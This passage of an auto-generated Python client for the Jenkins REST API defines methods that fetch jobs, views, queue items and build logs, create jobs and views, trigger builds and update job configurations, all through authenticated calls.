" to method get_job" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in local_var_params or
local_var_params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `get_job`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['jenkins_auth'] # noqa: E501
return self.api_client.call_api(
'/job/{name}/api/json', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FreeStyleProject', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_job_config(self, name, **kwargs): # noqa: E501
"""get_job_config # noqa: E501
Retrieve job configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_job_config(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the job (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_job_config_with_http_info(name, **kwargs) # noqa: E501
else:
(data) = self.get_job_config_with_http_info(name, **kwargs) # noqa: E501
return data
def get_job_config_with_http_info(self, name, **kwargs): # noqa: E501
"""get_job_config # noqa: E501
Retrieve job configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_job_config_with_http_info(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the job (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_job_config" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in local_var_params or
local_var_params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `get_job_config`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/xml']) # noqa: E501
# Authentication setting
auth_settings = ['jenkins_auth'] # noqa: E501
return self.api_client.call_api(
'/job/{name}/config.xml', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_job_last_build(self, name, **kwargs): # noqa: E501
"""get_job_last_build # noqa: E501
Retrieve job's last build details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_job_last_build(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the job (required)
:return: FreeStyleBuild
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_job_last_build_with_http_info(name, **kwargs) # noqa: E501
else:
(data) = self.get_job_last_build_with_http_info(name, **kwargs) # noqa: E501
return data
def get_job_last_build_with_http_info(self, name, **kwargs): # noqa: E501
"""get_job_last_build # noqa: E501
Retrieve job's last build details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_job_last_build_with_http_info(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the job (required)
:return: FreeStyleBuild
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_job_last_build" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in local_var_params or
local_var_params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `get_job_last_build`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['jenkins_auth'] # noqa: E501
return self.api_client.call_api(
'/job/{name}/lastBuild/api/json', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FreeStyleBuild', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_job_progressive_text(self, name, number, start, **kwargs): # noqa: E501
"""get_job_progressive_text # noqa: E501
Retrieve job's build progressive text output # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_job_progressive_text(name, number, start, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the job (required)
:param str number: Build number (required)
:param str start: Starting point of progressive text output (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_job_progressive_text_with_http_info(name, number, start, **kwargs) # noqa: E501
else:
(data) = self.get_job_progressive_text_with_http_info(name, number, start, **kwargs) # noqa: E501
return data
def get_job_progressive_text_with_http_info(self, name, number, start, **kwargs): # noqa: E501
"""get_job_progressive_text # noqa: E501
Retrieve job's build progressive text output # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_job_progressive_text_with_http_info(name, number, start, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the job (required)
:param str number: Build number (required)
:param str start: Starting point of progressive text output (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['name', 'number', 'start'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_job_progressive_text" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in local_var_params or
local_var_params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `get_job_progressive_text`") # noqa: E501
# verify the required parameter 'number' is set
if ('number' not in local_var_params or
local_var_params['number'] is None):
raise ValueError("Missing the required parameter `number` when calling `get_job_progressive_text`") # noqa: E501
# verify the required parameter 'start' is set
if ('start' not in local_var_params or
local_var_params['start'] is None):
raise ValueError("Missing the required parameter `start` when calling `get_job_progressive_text`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'number' in local_var_params:
path_params['number'] = local_var_params['number'] # noqa: E501
query_params = []
if 'start' in local_var_params:
query_params.append(('start', local_var_params['start'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['jenkins_auth'] # noqa: E501
return self.api_client.call_api(
'/job/{name}/{number}/logText/progressiveText', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_queue(self, **kwargs): # noqa: E501
"""get_queue # noqa: E501
Retrieve queue details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_queue(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: Queue
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_queue_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_queue_with_http_info(**kwargs) # noqa: E501
return data
def get_queue_with_http_info(self, **kwargs): # noqa: E501
"""get_queue # noqa: E501
Retrieve queue details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_queue_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: Queue
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_queue" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['jenkins_auth'] # noqa: E501
return self.api_client.call_api(
'/queue/api/json', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Queue', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_queue_item(self, number, **kwargs): # noqa: E501
"""get_queue_item # noqa: E501
Retrieve queued item details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_queue_item(number, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str number: Queue number (required)
:return: Queue
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_queue_item_with_http_info(number, **kwargs) # noqa: E501
else:
(data) = self.get_queue_item_with_http_info(number, **kwargs) # noqa: E501
return data
def get_queue_item_with_http_info(self, number, **kwargs): # noqa: E501
"""get_queue_item # noqa: E501
Retrieve queued item details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_queue_item_with_http_info(number, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str number: Queue number (required)
:return: Queue
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['number'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_queue_item" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'number' is set
if ('number' not in local_var_params or
local_var_params['number'] is None):
raise ValueError("Missing the required parameter `number` when calling `get_queue_item`") # noqa: E501
collection_formats = {}
path_params = {}
if 'number' in local_var_params:
path_params['number'] = local_var_params['number'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['jenkins_auth'] # noqa: E501
return self.api_client.call_api(
'/queue/item/{number}/api/json', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Queue', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_view(self, name, **kwargs): # noqa: E501
"""get_view # noqa: E501
Retrieve view details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_view(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the view (required)
:return: ListView
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_view_with_http_info(name, **kwargs) # noqa: E501
else:
(data) = self.get_view_with_http_info(name, **kwargs) # noqa: E501
return data
def get_view_with_http_info(self, name, **kwargs): # noqa: E501
"""get_view # noqa: E501
Retrieve view details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_view_with_http_info(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the view (required)
:return: ListView
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_view" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in local_var_params or
local_var_params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `get_view`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['jenkins_auth'] # noqa: E501
return self.api_client.call_api(
'/view/{name}/api/json', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ListView', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_view_config(self, name, **kwargs): # noqa: E501
"""get_view_config # noqa: E501
Retrieve view configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_view_config(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the view (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_view_config_with_http_info(name, **kwargs) # noqa: E501
else:
(data) = self.get_view_config_with_http_info(name, **kwargs) # noqa: E501
return data
def get_view_config_with_http_info(self, name, **kwargs): # noqa: E501
"""get_view_config # noqa: E501
Retrieve view configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_view_config_with_http_info(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the view (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_view_config" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in local_var_params or
local_var_params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `get_view_config`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/xml']) # noqa: E501
# Authentication setting
auth_settings = ['jenkins_auth'] # noqa: E501
return self.api_client.call_api(
'/view/{name}/config.xml', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def head_jenkins(self, **kwargs): # noqa: E501
"""head_jenkins # noqa: E501
Retrieve Jenkins headers # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.head_jenkins(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.head_jenkins_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.head_jenkins_with_http_info(**kwargs) # noqa: E501
return data
def head_jenkins_with_http_info(self, **kwargs): # noqa: E501
"""head_jenkins # noqa: E501
Retrieve Jenkins headers # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.head_jenkins_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method head_jenkins" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['jenkins_auth'] # noqa: E501
return self.api_client.call_api(
'/api/json', 'HEAD',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def post_create_item(self, name, **kwargs): # noqa: E501
"""post_create_item # noqa: E501
Create a new job using job configuration, or copied from an existing job # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_create_item(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the new job (required)
:param str _from: Existing job to copy from
:param str mode: Set to 'copy' for copying an existing job
:param str jenkins_crumb: CSRF protection token
:param str content_type: Content type header application/xml
:param str body: Job configuration in config.xml format
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.post_create_item_with_http_info(name, **kwargs) # noqa: E501
else:
(data) = self.post_create_item_with_http_info(name, **kwargs) # noqa: E501
return data
def post_create_item_with_http_info(self, name, **kwargs): # noqa: E501
"""post_create_item # noqa: E501
Create a new job using job configuration, or copied from an existing job # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_create_item_with_http_info(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the new job (required)
:param str _from: Existing job to copy from
:param str mode: Set to 'copy' for copying an existing job
:param str jenkins_crumb: CSRF protection token
:param str content_type: Content type header application/xml
:param str body: Job configuration in config.xml format
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['name', '_from', 'mode', 'jenkins_crumb', 'content_type', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_create_item" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in local_var_params or
local_var_params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `post_create_item`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'name' in local_var_params:
query_params.append(('name', local_var_params['name'])) # noqa: E501
if '_from' in local_var_params:
query_params.append(('from', local_var_params['_from'])) # noqa: E501
if 'mode' in local_var_params:
query_params.append(('mode', local_var_params['mode'])) # noqa: E501
header_params = {}
if 'jenkins_crumb' in local_var_params:
header_params['Jenkins-Crumb'] = local_var_params['jenkins_crumb'] # noqa: E501
if 'content_type' in local_var_params:
header_params['Content-Type'] = local_var_params['content_type'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['jenkins_auth'] # noqa: E501
return self.api_client.call_api(
'/createItem', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def post_create_view(self, name, **kwargs): # noqa: E501
"""post_create_view # noqa: E501
Create a new view using view configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_create_view(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the new view (required)
:param str jenkins_crumb: CSRF protection token
:param str content_type: Content type header application/xml
:param str body: View configuration in config.xml format
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.post_create_view_with_http_info(name, **kwargs) # noqa: E501
else:
(data) = self.post_create_view_with_http_info(name, **kwargs) # noqa: E501
return data
def post_create_view_with_http_info(self, name, **kwargs): # noqa: E501
"""post_create_view # noqa: E501
Create a new view using view configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_create_view_with_http_info(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the new view (required)
:param str jenkins_crumb: CSRF protection token
:param str content_type: Content type header application/xml
:param str body: View configuration in config.xml format
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['name', 'jenkins_crumb', 'content_type', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_create_view" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in local_var_params or
local_var_params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `post_create_view`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'name' in local_var_params:
query_params.append(('name', local_var_params['name'])) # noqa: E501
header_params = {}
if 'jenkins_crumb' in local_var_params:
header_params['Jenkins-Crumb'] = local_var_params['jenkins_crumb'] # noqa: E501
if 'content_type' in local_var_params:
header_params['Content-Type'] = local_var_params['content_type'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['jenkins_auth'] # noqa: E501
return self.api_client.call_api(
'/createView', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def post_job_build(self, name, json, **kwargs): # noqa: E501
"""post_job_build # noqa: E501
Build a job # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_job_build(name, json, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the job (required)
:param str json: (required)
:param str token:
:param str jenkins_crumb: CSRF protection token
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.post_job_build_with_http_info(name, json, **kwargs) # noqa: E501
else:
(data) = self.post_job_build_with_http_info(name, json, **kwargs) # noqa: E501
return data
def post_job_build_with_http_info(self, name, json, **kwargs): # noqa: E501
"""post_job_build # noqa: E501
Build a job # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_job_build_with_http_info(name, json, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the job (required)
:param str json: (required)
:param str token:
:param str jenkins_crumb: CSRF protection token
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['name', 'json', 'token', 'jenkins_crumb'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_job_build" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in local_var_params or
local_var_params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `post_job_build`") # noqa: E501
# verify the required parameter 'json' is set
if ('json' not in local_var_params or
local_var_params['json'] is None):
raise ValueError("Missing the required parameter `json` when calling `post_job_build`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
if 'json' in local_var_params:
query_params.append(('json', local_var_params['json'])) # noqa: E501
if 'token' in local_var_params:
query_params.append(('token', local_var_params['token'])) # noqa: E501
header_params = {}
if 'jenkins_crumb' in local_var_params:
header_params['Jenkins-Crumb'] = local_var_params['jenkins_crumb'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['jenkins_auth'] # noqa: E501
return self.api_client.call_api(
'/job/{name}/build', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def post_job_config(self, name, body, **kwargs): # noqa: E501
"""post_job_config # noqa: E501
Update job configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_job_config(name, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the job (required)
:param str body: Job configuration in config.xml format (required)
:param str jenkins_crumb: CSRF protection token
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.post_job_config_with_http_info(name, body, **kwargs) # noqa: E501
else:
(data) = self.post_job_config_with_http_info(name, body, **kwargs) # noqa: E501
return data
def post_job_config_with_http_info(self, name, body, **kwargs): # noqa: E501
"""post_job_config # noqa: E501
Update job configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_job_config_with_http_info(name, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the job (required)
:param str body: Job configuration in config.xml format (required)
:param str jenkins_crumb: CSRF protection token
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['name', 'body', 'jenkins_crumb'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_job_config" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in local_var_params or
local_var_params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `post_job_config`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in local_var_params or
local_var_params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_job_config`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
if 'jenkins_crumb' in local_var_params:
header_params['Jenkins-Crumb'] = local_var_params['jenkins_crumb'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
